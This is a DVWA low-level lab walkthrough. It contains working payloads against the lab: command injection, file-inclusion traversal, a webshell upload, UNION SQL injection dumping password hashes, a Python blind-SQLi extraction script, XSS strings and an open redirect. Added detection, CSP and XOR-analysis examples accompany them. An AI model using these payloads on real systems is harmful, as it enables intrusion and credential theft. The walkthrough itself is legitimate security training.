LOW
Brute Force
Brute forcing. Nothing much to say.
Command Injection
Command execution.
127.0.0.1 & dir
Solved in a second.
Cross Site Request Forgery (CSRF)
Cross-site request forgery.
A simple scenario: craft a malicious link that changes the password.
File Inclusion
Arbitrary file inclusion.
Looking at the URL, the file being loaded is actually controlled by the page parameter. So request a file that doesn't exist, and the error reveals the file path:

http://127.0.0.1/vulnerabilities/fi/?page=tsed.php

Warning: include(tsed.php): failed to open stream: No such file or directory in C:\YY\phpstudy_pro\WWW\DVWA-2.4\vulnerabilities\fi\index.php on line 36
Warning: include(): Failed opening 'tsed.php' for inclusion (include_path='.;C:\php\pear') in C:\YY\phpstudy_pro\WWW\DVWA-2.4\vulnerabilities\fi\index.php on line 36

http://127.0.0.1/vulnerabilities/fi/?page=../../phpinfo.php

Directory traversal lets us view the phpinfo file.
File Upload
File upload.
No filtering at all; a simple PHP one-line webshell goes straight up.
And it thoughtfully hands you the file path...
Splice the path together and the file is fetched and parsed successfully:
127.0.0.1/vulnerabilities/upload/../../hackable/uploads/1.php
Connect with AntSword right away, what are you waiting for.
Insecure CAPTCHA
Insecure CAPTCHA.
An error as soon as you enter:
reCAPTCHA API key missing from config file: C:\YY\phpstudy_pro\WWW\DVWA-2.4\config\config.inc.php
A quick Baidu search. This is payback for cutting corners when I set up the environment. Edit config.inc.php:

$_DVWA[ 'recaptcha_public_key' ]  = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';

Refresh the page and the error is gone. On to the challenge.
Network problems, it seems... giving up.
SQL Injection
SQL injection, heh heh heh.
GET parameter, string type closed with a single quote.

GET /vulnerabilities/sqli/?id=1'+and+1=2--+&Submit=Submit
# confirms the injection exists
GET /vulnerabilities/sqli/?id=1'+order+by+2--+&Submit=Submit
# two columns
GET /vulnerabilities/sqli/?id=1'+union+select+1,2--+&Submit=Submit
# both columns are echoed back
GET /vulnerabilities/sqli/?id=1'+union+select+version(),database()--+&Submit=Submit
# database version: 5.7.26, database name: dvwa
Everything was going fine at first. Just a simple SQL injection, no filtering, no WAF. But once I started injecting to list the table names, everything changed.
What a pitfall. I spent ages troubleshooting and started to doubt whether my skills were so poor that I couldn't even pull off the most basic SQL injection.
Damn it. First, the original statement:

GET /vulnerabilities/sqli/?id=1'+union+select+table_name,2+from+information_schema.tables+where+table_schema='dvwa'--+
# the simplest injection statement there is; I checked it over and over and found nothing wrong, but it kept erroring out and wouldn't inject
# it kept giving me 'Illegal mix of collations for operation 'UNION''
And in the end, guess what: the character set and collation of the dvwa tables didn't match those of information_schema...
Ridiculous. It was my own environment that was broken.
Problem found, so fix it: unify the collation.

ALTER TABLE users CONVERT TO CHARACTER SET utf8 COLLATE utf8_general_ci;  # change the table's character set and collation

So the statement should inject now, right?

GET /vulnerabilities/sqli/?id=1'+union+select+2,table_name+from+information_schema.tables+where+table_schema='dvwa'--+
# the dvwa database has two tables: users, guestbook
GET /vulnerabilities/sqli/?id=1'+union+select+column_name,2+from+information_schema.columns+where+table_name='users'--+
# the users table has these columns: user_id, first_name, last_name, user, password, avatar, last_login, failed_login
GET /vulnerabilities/sqli/?id=1'+union+select+user,password+from+users--+
# got the usernames and password hashes, hahaha
SQL Injection (Blind)
SQL blind injection.
After testing, it's again a GET parameter closed with a single quote.

http://192.168.3.15/vulnerabilities/sqli_blind/?id=1'+and+3=3--+&Submit=Submit#
# message when the guess is correct: User ID exists in the database.
http://192.168.3.15/vulnerabilities/sqli_blind/?id=1'+and+2=3--+&Submit=Submit#
# message when the guess is wrong: User ID is MISSING from the database.
So let's write a Python script...
Alright, here's a pitfall: how do you simulate a login in Python... time to learn.
OK, Python 3 with the requests library to simulate the login.
First capture traffic on the site after logging in, grab the post-login cookie and reuse it, as in the example below. Note that the cookie must be written as a dict.
import requests

cookies={"security":"low","PHPSESSID":"0u6h22non1g09bducgi804edmv"}
url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+length(database())=1--+&Submit=Submit#"
req=requests.get(url,cookies=cookies)
req=req.text
print(req)
Next, the complete blind injection:
import requests

key = "MISSING"   # this word appears in the response when the guessed condition is false
cookies = {"security": "low", "PHPSESSID": "0u6h22non1g09bducgi804edmv"}

def onefor(a):
    # single loop: find a length or a count by testing 1..a; uncomment one url at a time
    for i in range(1, a+1):
        #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+length(database())={i}--+&Submit=Submit#" #the database name has 4 characters
        #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+(select+count(*)+from+information_schema.tables+where+table_schema='dvwa')={i}--+&Submit=Submit#" #the dvwa database has 2 tables
        #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+length((select+table_name+from+information_schema.tables+where+table_schema='dvwa'+limit+1,1))={i}--+&Submit=Submit#" #the first table (limit 0,1) has 9 characters, the second (limit 1,1) has 5
        #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+(select+count(*)+from+information_schema.columns+where+table_name='users'+and+table_schema='dvwa')={i}--+&Submit=Submit#" #the users table has 8 columns
        #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+length((select+column_name+from+information_schema.columns+where+table_name='users'+and+table_schema='dvwa'+limit+0,1))={i}--+&Submit=Submit#" #the first column of users has 7 characters
        #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+(select+count(*)+from+users)={i}--+&Submit=Submit#" #the users table has 5 rows
        url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+length((select+user+from+users+limit+0,1))={i}--+&Submit=Submit#" #the first row of users.user has 5 characters
        req = requests.get(url, cookies=cookies)
        req = req.text
        print(url)
        if key not in req:   # no MISSING in the response: the condition held
            print('!'*10)
            print(i)
            print('!'*10)
            break

def twofor(a):
    name = ''   # accumulates the database name, table name or field value one character at a time
    for j in range(1, a+1):
        for i in range(33, 127):   # printable ASCII
            #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+ascii(mid(database(),{j},1))={i}--+&Submit=Submit#" #database name: dvwa
            #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+ascii(mid((select+table_name+from+information_schema.tables+where+table_schema='dvwa'+limit+1,1),{j},1))={i}--+&Submit=Submit#" #the first table is guestbook, the second is users
            #url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+ascii(mid((select+column_name+from+information_schema.columns+where+table_name='users'+and+table_schema='dvwa'+limit+0,1),{j},1))={i}--+&Submit=Submit#" #the first column of users is user_id
            url=f"http://192.168.3.15/vulnerabilities/sqli_blind/?id=1%27+and+ascii(mid((select+user+from+users+limit+0,1),{j},1))={i}--+&Submit=Submit#" #the first row of users.user is admin
            req = requests.get(url, cookies=cookies)
            req = req.text
            print(url)
            if key not in req:
                name = name + chr(i)
                print('*'*100)
                print(name)
                print('*'*100)
                break

#onefor(5)
twofor(5)
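Seen from the defender's side, the enumeration the script above performs leaves a very recognisable trail: many requests from one client, each breaking out of the id value with a quote and comparing ascii(mid(...)), length(...) or a count against a constant. This is an added example, not from the original post: a small access-log scanner that flags that pattern; the log lines are constructed here in Apache combined format, and the threshold is an assumption.

```python
# Added example (not from the original post): detecting boolean-based blind SQL
# injection probing in web-server access logs. SAMPLE_LOG is constructed to look
# like Apache combined-format entries carrying the same probe shapes as the post.
import re
from collections import defaultdict
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
192.168.3.20 - - [01/May/2024:10:00:01 +0800] "GET /vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 1900
192.168.3.50 - - [01/May/2024:10:00:02 +0800] "GET /vulnerabilities/sqli_blind/?id=1%27+and+length(database())=4--+&Submit=Submit HTTP/1.1" 200 1900
192.168.3.50 - - [01/May/2024:10:00:02 +0800] "GET /vulnerabilities/sqli_blind/?id=1%27+and+(select+count(*)+from+information_schema.tables+where+table_schema='dvwa')=2--+&Submit=Submit HTTP/1.1" 200 1900
192.168.3.50 - - [01/May/2024:10:00:03 +0800] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii(mid(database(),1,1))=99--+&Submit=Submit HTTP/1.1" 200 1900
192.168.3.50 - - [01/May/2024:10:00:03 +0800] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii(mid(database(),1,1))=100--+&Submit=Submit HTTP/1.1" 200 1900
192.168.3.20 - - [01/May/2024:10:00:04 +0800] "GET /vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 1900
"""

# client ip, request path and status from a combined-format line
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" (?P<status>\d+)')
# A quote closing the id value, a boolean operator, then a function or subquery that
# turns data into a comparable number: the shape of inference-based probing.
PROBE_RE = re.compile(
    r"""['"]\s*(?:and|or)\s+\(?\s*(?:ascii|length|substring|substr|mid|count|select)\b""",
    re.IGNORECASE)

def probe_requests(log_text):
    """Map client IP -> list of decoded query strings that look like blind-SQLi probes."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = unquote_plus(m.group("path").partition("?")[2])  # decodes %27 and '+'
        if PROBE_RE.search(query):
            hits[m.group("ip")].append(query)
    return hits

def flag_clients(log_text, threshold=3):
    """Clients whose probe count reaches the threshold. Character-by-character
    enumeration needs many requests, so a low threshold still separates it from a
    one-off manual test (threshold value is an assumption)."""
    return {ip: len(qs) for ip, qs in probe_requests(log_text).items() if len(qs) >= threshold}

if __name__ == "__main__":
    print(flag_clients(SAMPLE_LOG))
```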
Weak Session IDs
This is just forging the cookie value to log in.
DOM Based Cross Site Scripting (XSS)
DOM-based XSS. What sets DOM XSS apart is that it generally has no direct connection to how the server parses and responds; it arises while the JavaScript executes dynamically.

http://192.168.3.15/vulnerabilities/xss_d/?default=English
# clicking the button reloads the page; looking at the GET parameters, the default parameter may be vulnerable to DOM XSS
192.168.3.15/vulnerabilities/xss_d/?default=<script>alert('XSS')</script>
# crafted payload pops an alert
Reflected Cross Site Scripting (XSS)
Reflected XSS usually shows up in features like search, and the victim has to click the corresponding link for it to trigger.
Looking at the page there's an input box, so type in the test string and submit:

<script>alert('XSS')</script>
# the alert pops; the link carrying the payload is:
http://192.168.3.15/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E#
Stored Cross Site Scripting (XSS)
Stored XSS is more dangerous than reflected XSS: the attacker can store the payload in the server's database, giving a persistent attack.
This is especially common in scenarios like guestbooks, and that is exactly what this level is.
Looking at the page: a guestbook on top, some test messages below.
Fill in the test string directly:

Name: qwe
Message: <script>alert('XSS')</script>

As you can see, the page pops an alert, and the qwe title is visible but the message body isn't.
That's because the test string was executed as part of the page instead of being rendered as a text element.
Content Security Policy (CSP) Bypass
Oh, something new at first glance, never seen it. Let's look it up.
Content Security Policy defines where scripts and other resources may be loaded from or executed; in short, it's a whitelist. It mitigates XSS to a degree, and you can set your own rules to manage which content the site is allowed to load.
CSP works as a whitelist mechanism on the resources a site loads or executes; on a page the policy is defined via an HTTP header or a meta element. While CSP provides strong protection, it also disables eval() and related functions, prevents inline JavaScript from executing, and only allows remote scripts to be loaded from the whitelist.
OK, understood. Let's look at the code.
<?php
$headerCSP = "Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com https://digi.ninja ;"; // allows js from self, pastebin.com, hastebin.com, jquery, digi.ninja, and google analytics.

header($headerCSP);

# These might work if you can't create your own for some reason
# https://pastebin.com/raw/R570EE00
# https://www.toptal.com/developers/hastebin/raw/cezaruzeka
?>
<?php
if (isset ($_POST['include'])) {
$page[ 'body' ] .= "
    <script src='" . $_POST['include'] . "'></script>
";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>You can include scripts from external sources, examine the Content Security Policy and enter a URL to include here:</p>
    <input size="50" type="text" name="include" value="" id="include" />
    <input type="submit" value="Include" />
</form>
<p>
As Pastebin and Hastebin have stopped working, here are some scripts that may, or may not help.
</p>
<ul>
<li>https://digi.ninja/dvwa/alert.js</li>
<li>https://digi.ninja/dvwa/alert.txt</li>
<li>https://digi.ninja/dvwa/cookie.js</li>
<li>https://digi.ninja/dvwa/forced_download.js</li>
<li>https://digi.ninja/dvwa/wrong_content_type.js</li>
</ul>
<p>
Pretend these are on a server like Pastebin and try to work out why some work and some do not work. Check the help for an explanation if you get stuck.
</p>
';
Alright, so you trust JS from these domains: pastebin.com, hastebin.com, jquery, digi.ninja, and google analytics.
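A simplified model of the browser-side check, added here as an example and not part of DVWA or the original post: parse the script-src directive from the low-level header above and decide which script URLs it permits, which makes plain why a policy that allowlists a paste site still lets arbitrary scripts in. Host-source matching is simplified (scheme optional, exact host or a leading '*.', no port or path), and the page URL is assumed to be the DVWA host from this write-up.

```python
# Added example (not DVWA code): a simplified model of how a browser matches a
# <script src> URL against the script-src allowlist from the page's CSP header.
# Simplifications: host-source = optional scheme + exact host or '*.' wildcard;
# ports, paths, nonces and hashes are not modelled.
from urllib.parse import urlsplit

# the directive value from DVWA's low-level CSP source above
DVWA_LOW_CSP = ("script-src 'self' https://pastebin.com hastebin.com www.toptal.com "
                "example.com code.jquery.com https://ssl.google-analytics.com https://digi.ninja ;")

def parse_directive(policy, name):
    """Return the source list of one directive (e.g. script-src), or None if absent."""
    for directive in policy.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == name:
            return parts[1:]
    return None

def host_matches(pattern, host):
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])   # '*.example.com' matches 'a.example.com' only
    return pattern == host

def script_allowed(policy, page_url, script_url):
    """True if a <script src=script_url> on page_url is permitted by script-src."""
    sources = parse_directive(policy, "script-src")
    if sources is None:
        return True   # no script-src (default-src fallback not modelled here)
    page, script = urlsplit(page_url), urlsplit(script_url)
    for src in sources:
        if src == "'self'":
            if (script.scheme, script.hostname) == (page.scheme, page.hostname):
                return True
        elif src.startswith("'"):
            continue   # keyword sources such as 'unsafe-inline' never match a URL
        else:
            scheme, host = src.split("://", 1) if "://" in src else (None, src)
            if not host_matches(host, script.hostname or ""):
                continue
            # scheme-less host-source: same scheme as the page, or an https upgrade
            if scheme is None and script.scheme in (page.scheme, "https"):
                return True
            if scheme is not None and script.scheme == scheme:
                return True
    return False

def inline_allowed(policy):
    """Inline <script> blocks run only if script-src lists 'unsafe-inline' (nonces/hashes aside)."""
    sources = parse_directive(policy, "script-src")
    return sources is None or "'unsafe-inline'" in sources
```

With this policy an inline `<script>alert(1)</script>` is refused, but any file served from pastebin.com over https is accepted, so the allowlist is only as trustworthy as the least trustworthy host on it.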
JavaScript Attacks
What does that mean? Something new again...
Front-end security... I never learned JS either.
The page opens asking me to enter success, and when I do it says the token is invalid. Let's look at the source.
The key code:

function generate_token() {
    var phrase = document.getElementById("phrase").value;
    document.getElementById("token").value = md5(rot13(phrase));
}
Couldn't read it, so I asked an AI:
This code is a JavaScript function, generate_token(). It takes the phrase the user entered from the HTML document, runs it through an encryption step, and then writes the result into another element on the page. A detailed analysis of the function follows:
Oh, so the token is generated from and bound to the string the user enters.
Let's capture the request.
Huh, no matter what I enter the token doesn't change, no wonder it says the token is invalid.
Type success into the text box first, then open the F12 console and call generate_token() there to generate the token manually.
Worked, haha. Captured the request and the token had indeed changed.
I'll brush up on JS when I have time.
Authorisation Bypass
Such a grand name for what is just unauthorized access...
Low mode is too weak: there are no restrictions at all, just switch to a different account and you can access it.
Open HTTP Redirect
Er, a redirect vulnerability?
Straight to the source:
vulnerabilities/open_redirect/source/low.php
<?php
if (array_key_exists ("redirect", $_GET) && $_GET['redirect'] != "") {
    header ("location: " . $_GET['redirect']);
    exit;
}

http_response_code (500);
?>
<p>Missing redirect target.</p>
<?php
exit;
?>
Alright, the vulnerable code lives in a different directory.
Let's look at the payload:
http://192.168.3.15/vulnerabilities/open_redirect/source/low.php?redirect=https://baidu.com
Cryptography Problems
Lg4WGlQZChhSFBYSEB8bBQtPGxdNQSwEHREOAQY=
Hmm, it looks like base-something encoded text, but I tried the whole base family: apart from base45, which decodes to a string that is still wrong, none of them decode. Let's audit the source.
<?php
function xor_this($cleartext, $key) {
    // Our output text
    $outText = '';

    // Iterate through each character
    for($i=0; $i<strlen($cleartext);) {
        for($j=0; ($j<strlen($key) && $i<strlen($cleartext)); $j++,$i++) {
            $outText .= $cleartext[$i] ^ $key[$j];
        }
    }
    return $outText;
}

$key = "wachtwoord";
$errors = "";
$success = "";
$messages = "";
$encoded = null;
$encode_radio_selected = " checked='checked' ";
$decode_radio_selected = " ";
$message = "";

if ($_SERVER['REQUEST_METHOD'] == "POST") {
    try {
        if (array_key_exists ('message', $_POST)) {
            $message = $_POST['message'];
            if (array_key_exists ('direction', $_POST) && $_POST['direction'] == "decode") {
                $encoded = xor_this (base64_decode ($message), $key);   // decoding: base64-decode the message first, then XOR it with the key
                $encode_radio_selected = " ";
                $decode_radio_selected = " checked='checked' ";
            } else {
                $encoded = base64_encode(xor_this ($message, $key));
            }
        }
        if (array_key_exists ('password', $_POST)) {
            $password = $_POST['password'];
            $decoded = xor_this (base64_decode ($password), $key);   // key logic: base64-decode first, then XOR
            if ($password == "Olifant") {   // wait, doesn't this just give the answer away? heh heh heh. Still have to write the decoder though
                $success = "Welcome back user";
            } else {
                $errors = "Login Failed";
            }
        }
    } catch(Exception $e) {
        $errors = $e->getMessage();
    }
}
?>
So it isn't plain base64 after all, there's XOR mixed in; no wonder it wouldn't decode.
Now that the encode/decode logic is clear, all that's left is to write the decryption script in Python:
import base64

def xor(message, key):
    # message is bytes (the base64-decoded ciphertext), key is a str
    outText = ""
    key_length = len(key)
    for i in range(len(message)):
        key_char = key[i % key_length]   # I think this step is clever; copied from an AI, I couldn't have written it...
        outText += chr(message[i] ^ ord(key_char))
    return outText

message = "Lg4WGlQZChhSFBYSEB8bBQtPGxdNQSwEHREOAQY="
key = "wachtwoord"
print(xor(base64.b64decode(message), key))
OK, so the output is: Your new password is: Olifant
Wow, there's even a hint message in there. Alright then.
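The scheme above also shows why base64 of a repeating-key XOR is an encoding rather than encryption: ciphertext XOR plaintext equals the keystream at every position, so a guess at how the message starts recovers the key, and the key's period becomes visible as soon as the guess is longer than the key. This is an added example, not part of the original post or DVWA; it uses the ciphertext from the page, and "Your new password" is assumed as a plausible opening for a password-reset message.

```python
# Added example (not from the original post): known-plaintext key recovery against
# base64(repeating-key XOR). xor_bytes() mirrors DVWA's xor_this(); the rest shows
# how little a guessed plaintext prefix leaves of the "encryption".
import base64
from itertools import cycle

CIPHERTEXT_B64 = "Lg4WGlQZChhSFBYSEB8bBQtPGxdNQSwEHREOAQY="   # ciphertext from the page

def xor_bytes(data, key):
    """Repeating-key XOR over bytes; equivalent to DVWA's xor_this()."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def encrypt(plaintext, key):
    """DVWA's encode direction: base64(xor_this(message, key))."""
    return base64.b64encode(xor_bytes(plaintext.encode(), key.encode())).decode()

def decrypt(ciphertext_b64, key):
    return xor_bytes(base64.b64decode(ciphertext_b64), key).decode("latin-1")

def recover_key(ciphertext, known_prefix):
    """Shortest repeating key consistent with a known plaintext prefix.
    ciphertext XOR plaintext gives the keystream; if the prefix is shorter than the
    key, only that much of the keystream is recovered and the result is incomplete."""
    stream = xor_bytes(ciphertext[: len(known_prefix)], known_prefix)
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    return stream

def break_with_guess(ciphertext_b64, guess):
    """Recover (key, message) from a plaintext guess; 'guess' is an assumption."""
    key = recover_key(base64.b64decode(ciphertext_b64), guess.encode())
    return key.decode("latin-1"), decrypt(ciphertext_b64, key)

if __name__ == "__main__":
    print(break_with_guess(CIPHERTEXT_B64, "Your new password"))
```

A 17-byte guess is already longer than the 10-byte key, so the full key and message fall out; a guess of only "Your" yields just the first four key bytes and a garbled message, which is the only thing standing between this scheme and plaintext.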